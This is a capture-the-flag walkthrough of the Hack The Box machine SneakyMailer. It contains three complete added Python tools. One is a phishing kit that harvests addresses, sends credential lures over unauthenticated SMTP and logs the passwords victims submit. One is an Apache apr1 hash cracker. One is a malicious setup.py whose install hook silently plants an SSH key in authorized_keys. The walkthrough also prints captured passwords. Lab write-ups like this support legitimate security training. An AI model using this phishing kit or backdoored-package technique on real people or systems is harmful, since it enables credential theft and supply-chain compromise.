SneakyMailer — HTB Walkthrough
What? Another Sneaky HTB box? Maybe so, but it was fun to solve: real-life phishing-attack practice, and the user part was definitely a level up. Let's start.

ENUMERATION
A full nmap scan of all TCP ports reveals the following:


PORT 21 FTP Enumeration
— — Anonymous login failed.
PORT 80 HTTP ENUMERATION
Visiting the website:

Add the hostname to /etc/hosts:


We get three pieces of information:
— — pip install can install Python modules on the server
— — We have to read mails for further exploitation
— — We get some usernames from the Teams and Messages sections

Viewing the page source we can see the messages:

Teams






Normal enumeration such as directory busting gave us nothing of importance.
Failed approaches:
1) HTTP: gobuster and similar tools turned up nothing.
2) SMTP user enumeration would just test a username list to see which accounts exist; that adds little, since we already have the users from the website.
3) IMAP: to read mail I need to log in as some user, and I have no credentials yet.
4) FTP: anonymous login failed :(
So what can we do? This box asks us to think logically. What about email harvesting and a phishing attempt? We already harvested email addresses during the HTTP enumeration on port 80, so we can try sending some phishing mails. Let's see how.
PORT 25 SMTP ENUMERATION
First, let's collect the email addresses and the usernames into two separate lists.



EXPLOITATION
We will use swaks (available on GitHub) to send the mails. First start a netcat listener on port 80. Then we send every harvested address a phishing mail with a link pointing at our IP; if even a single user clicks it, we may get something juicy.


On the netcat listener on port 80 we see that the user Paul got back to us, sending his credentials to our link:

Username: Paul && Password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
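The harvest, send and catch loop described above, as an added example (not the author's swaks and netcat commands): it pulls addresses out of a constructed team-page snippet, mails each one a lure with smtplib, and runs a small HTTP listener that URL-decodes whatever a victim's client posts back, so a password full of %-escapes is readable in the log. The sample HTML, the sender address, the form field names and the hostnames are assumptions.

```python
"""Harvest addresses, send lures, and log what the victims post back.
Added example; swaps in smtplib + http.server for the swaks + nc combo."""
import re
import smtplib
import sys
from email.message import EmailMessage
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

# Constructed stand-in for the team page's HTML (not the real page).
SAMPLE_HTML = """
<div class="member"><h4>Alice Adams</h4><p>alice.adams@sneakycorp.htb</p></div>
<div class="member"><h4>Bob Brown</h4><p>bob.brown@sneakycorp.htb</p></div>
<div class="member"><h4>Alice Adams</h4><p>alice.adams@sneakycorp.htb</p></div>
<a href="mailto:support@sneakycorp.htb">Support</a>
"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def harvest_emails(html: str) -> list:
    """Return the unique addresses in page order (duplicates dropped)."""
    seen, out = set(), []
    for addr in EMAIL_RE.findall(html):
        addr = addr.lower()
        if addr not in seen:
            seen.add(addr)
            out.append(addr)
    return out


def usernames_from_emails(emails) -> list:
    """The local part is usually the login name; handy for IMAP later."""
    return [e.split("@", 1)[0] for e in emails]


def build_lure(to_addr: str, from_addr: str, url: str) -> EmailMessage:
    """One plain-text lure pointing at our listener."""
    msg = EmailMessage()
    msg["From"] = from_addr
    msg["To"] = to_addr
    msg["Subject"] = "Mailbox migration: please re-confirm your account"
    msg.set_content(
        "Hi,\n\nWe are migrating the mail server tonight. Please confirm your "
        f"account at {url} so your mailbox is carried over.\n\nIT Support"
    )
    return msg


def send_lures(emails, smtp_host, from_addr, url, smtp_port=25):
    """Deliver one lure per address over plain, unauthenticated SMTP."""
    with smtplib.SMTP(smtp_host, smtp_port, timeout=10) as smtp:
        for addr in emails:
            smtp.send_message(build_lure(addr, from_addr, url))
            print(f"[+] sent lure to {addr}")


def parse_submission(body: bytes) -> dict:
    """Decode an x-www-form-urlencoded POST body into a flat dict."""
    fields = parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


class CatchHandler(BaseHTTPRequestHandler):
    """Logs every request; POST bodies are decoded so passwords are readable."""

    def do_GET(self):
        print(f"[+] GET {self.path} from {self.client_address[0]}")
        self._ok()

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length)
        print(f"[+] POST {self.path} from {self.client_address[0]}")
        for key, value in parse_submission(body).items():
            print(f"    {key} = {value}")
        self._ok()

    def _ok(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"Thank you, your account has been confirmed.\n")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        sys.exit("usage: phish.py <smtp-host> <our-ip> [listen-port]")
    smtp_host, our_ip = sys.argv[1], sys.argv[2]
    listen_port = int(sys.argv[3]) if len(sys.argv) > 3 else 80
    targets = harvest_emails(SAMPLE_HTML)  # replace with the fetched page
    lure_url = f"http://{our_ip}:{listen_port}/confirm"
    send_lures(targets, smtp_host, "it-support@sneakycorp.htb", lure_url)
    print(f"[*] listening on 0.0.0.0:{listen_port} for callbacks ...")
    HTTPServer(("0.0.0.0", listen_port), CatchHandler).serve_forever()
```

Run it as root (port 80 is privileged) with the target's SMTP host and your own IP, after replacing SAMPLE_HTML with the HTML you actually fetched. Like swaks, send_lures talks to the target's own mail server unauthenticated on port 25; the value over a bare netcat listener is that the handler decodes the form body, so special characters in a captured password are not left as %-escapes.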
I used the Evolution mail client on Kali to read the mails.

Set up Evolution by signing in as Paul, using his email address and the password we just captured, and read his mails.
Mails

Hello administrator, I want to change this password for the developer account. Username: developer && Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C ;Please notify me when you do it
Another mail is about Python and PyPI.

The developer password from that mail works for FTP.
FTP Enumeration
Log in to FTP with the developer username and password:


Register.php

I initially thought of registering a user via a curl request, but we don't need to: it is a rabbit hole.
Then what? Can we upload files to the server with the FTP put command? Yes, so I uploaded pentestmonkey's php-reverse-shell.

But where do we reach it? Time for subdomain and directory busting. We have already busted directories, so let's look for subdomains (virtual hosts).

Fuzzing subdomains with wfuzz, I found dev.sneakycorp.htb. Adding it to /etc/hosts and requesting the uploaded shell there gives us a reverse shell.


POST EXPLOITATION
Now that we are www-data, it's time to get a user.

Let's enumerate. We already know what is in dev.sneakycorp.htb (the same content we saw over FTP), but pypi.sneakycorp.htb is something new.

Username: pypi
Password hash : $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
This looks like an Apache apr1 (MD5-based htpasswd) hash; let's crack it with hashcat, mode 1600.
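What hashcat mode 1600 is actually computing, as an added example (not from the write-up): a pure-Python re-implementation of Apache's apr1 htpasswd hash with a small dictionary loop, useful to sanity-check a hash's format or a handful of guesses when hashcat is not at hand. The candidate password and salt used in the demo are constructed.

```python
"""Verify and dictionary-attack Apache $apr1$ (htpasswd MD5) hashes.
Added example: the algorithm is FreeBSD md5crypt with the $apr1$ magic."""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"


def _to64(value: int, count: int) -> str:
    """crypt(3)-style base64: 6 bits at a time, least significant first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_crypt(password: str, salt: str) -> str:
    """Return '$apr1$<salt>$<22 chars>' for password under salt (max 8 chars)."""
    pw = password.encode()
    salt = salt[:8].split("$")[0]          # at most 8 chars, stop at a '$'
    sb = salt.encode()

    ctx = hashlib.md5(pw + MAGIC + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    # feed len(pw) bytes of the alternate digest, 16 at a time
    for remaining in range(len(pw), 0, -16):
        ctx.update(alt[: min(16, remaining)])
    # one byte per bit of len(pw): NUL for a set bit, pw[0] otherwise
    bits = len(pw)
    while bits:
        ctx.update(b"\x00" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()

    # 1000 rounds of stretching with a fixed mixing schedule
    for i in range(1000):
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sb)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()

    # encode the 16 digest bytes in the permuted order crypt(3) uses
    order = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order
    )
    encoded += _to64(final[11], 2)
    return f"$apr1${salt}${encoded}"


def parse_apr1(hash_str: str):
    """Split '$apr1$<salt>$<22 chars>' into (salt, digest); reject other formats."""
    parts = hash_str.split("$")
    if len(parts) != 4 or parts[1] != "apr1" or len(parts[3]) != 22:
        raise ValueError("not an apr1 hash")
    return parts[2], parts[3]


def check_apr1(hash_str: str, candidate: str) -> bool:
    """True if candidate is the password behind hash_str."""
    salt, _ = parse_apr1(hash_str)
    return apr1_crypt(candidate, salt) == hash_str


def crack_apr1(hash_str: str, candidates):
    """Return the first candidate that matches, or None."""
    for cand in candidates:
        if check_apr1(hash_str, cand):
            return cand
    return None


if __name__ == "__main__":
    # Constructed demo: hash a password ourselves, then recover it from a list.
    target = apr1_crypt("Winter2020!", "RV5c5YVs")
    words = ["password", "pypi", "Winter2020!", "letmein"]
    print(target, "->", crack_apr1(target, words))
```

The 1000 MD5 rounds are why apr1 is slow to brute-force in pure Python but still trivial for hashcat on a GPU; for a real wordlist, hand the hash to hashcat -m 1600 and keep this script for verifying the result.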


Let's see what is happening on port 8080, which was open.

There are lots of connections to localhost:8080. Also, visiting pypi.sneakycorp.htb:8080/ I see:

When I try to access packages, I see that we need to authenticate as the user pypi.

Let's use the creds we have:

It seems no package is there. Same with “simple”.
https://packaging.python.org/tutorials/packaging-projects/#generating-distribution-archives
Let's create a package in the /tmp directory, following the packaging tutorial above.

nano and vi did not work in this shell, so I made the files on my own system and fetched them with wget.
First create an SSH key pair; the package will drop the public key into low's authorized_keys so that you can SSH in as low with your private key.

Fetch all the files under sample_package with wget. The contents must look like this:

README.md and setup.cfg

setup.py and sample_package/__init__.py

Now that our package is ready, we need to deploy it to the pypi server:
1) Build a source distribution with sdist.

2) Create a .pypirc in the HOME folder.
The upload tooling reads .pypirc from the current user's home directory, so first point HOME at the package directory (export HOME=/tmp/sample_package), then wget the file as before. With the repository URL and the pypi credentials in place, upload the sdist to that repository.
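The two files the write-up fetched with wget, as an added example (not the author's own files): a setup.py whose install step appends our SSH public key to the installing user's authorized_keys, plus a helper that emits the matching .pypirc. It assumes, as the write-up does, that something on the box installs packages from pypi.sneakycorp.htb:8080 as the user low, so the install step runs as low; the public key, package name and credentials are placeholders.

```python
"""setup.py for a malicious sdist aimed at a pypi server that someone
installs from blindly. Added example; names, key and URL are placeholders."""
import os
import stat

PACKAGE = "sample_package"  # the directory layout used in the write-up
# Placeholder public key: generate your own with ssh-keygen and paste it here.
PUBKEY = ("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleExampleExampleExample"
          "ExampleExample attacker@kali")


def install_key(pubkey: str, auth_path: str = None) -> bool:
    """Append pubkey to authorized_keys (default: the current user's) with
    permissions sshd accepts. Returns True if the key was newly added."""
    if auth_path is None:
        auth_path = os.path.expanduser("~/.ssh/authorized_keys")
    ssh_dir = os.path.dirname(auth_path)
    os.makedirs(ssh_dir, mode=0o700, exist_ok=True)
    os.chmod(ssh_dir, 0o700)            # sshd rejects group/world-writable dirs
    existing = ""
    if os.path.exists(auth_path):
        with open(auth_path) as fh:
            existing = fh.read()
    if pubkey.strip() in existing.splitlines():
        return False                    # idempotent: a reinstall adds no duplicate
    with open(auth_path, "a") as fh:
        if existing and not existing.endswith("\n"):
            fh.write("\n")
        fh.write(pubkey.strip() + "\n")
    os.chmod(auth_path, stat.S_IRUSR | stat.S_IWUSR)   # 0600
    return True


def pypirc_text(repo_url: str, username: str, password: str) -> str:
    """Contents of the ~/.pypirc that `setup.py sdist upload -r local` reads."""
    return (
        "[distutils]\n"
        "index-servers =\n"
        "    local\n"
        "\n"
        "[local]\n"
        f"repository: {repo_url}\n"
        f"username: {username}\n"
        f"password: {password}\n"
    )


if __name__ == "__main__":
    from setuptools import setup
    from setuptools.command.install import install

    class DropKey(install):
        """Runs when the victim's pip installs our sdist (the install command
        also runs inside bdist_wheel), i.e. as whoever invoked pip."""

        def run(self):
            try:
                install_key(PUBKEY)
            except OSError:
                pass                    # never break the install; stay quiet
            super().run()

    setup(
        name=PACKAGE,
        version="0.0.1",
        packages=[PACKAGE],             # needs sample_package/__init__.py on disk
        cmdclass={"install": DropKey},
    )
```

Write pypirc_text("http://pypi.sneakycorp.htb:8080", "pypi", "<cracked password>") to $HOME/.pypirc, then build and upload with python3 setup.py sdist upload -r local. Hooking the install command, rather than putting the payload at the top level of setup.py, means building the sdist on your own box does not fire it; the top-level variant also works against the target because pip executes setup.py in full. The same primitive is what the GTFOBins sudo pip entry in the privilege-escalation step below relies on: code in setup.py runs as whoever runs pip, which under sudo is root.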



We see that our public key has been added to low's home directory (authorized_keys).

SSH in as low with our private key.

PRIVILEGE ESCALATION
The easiest part of the whole machine was escalating privileges.

We can abuse sudo access to pip using the GTFOBins recipe.


After thinking about it for a while, I noticed that the sudo rule allows pip3, not pip, so the GTFOBins payload has to be run through sudo pip3.

ROOTED!!!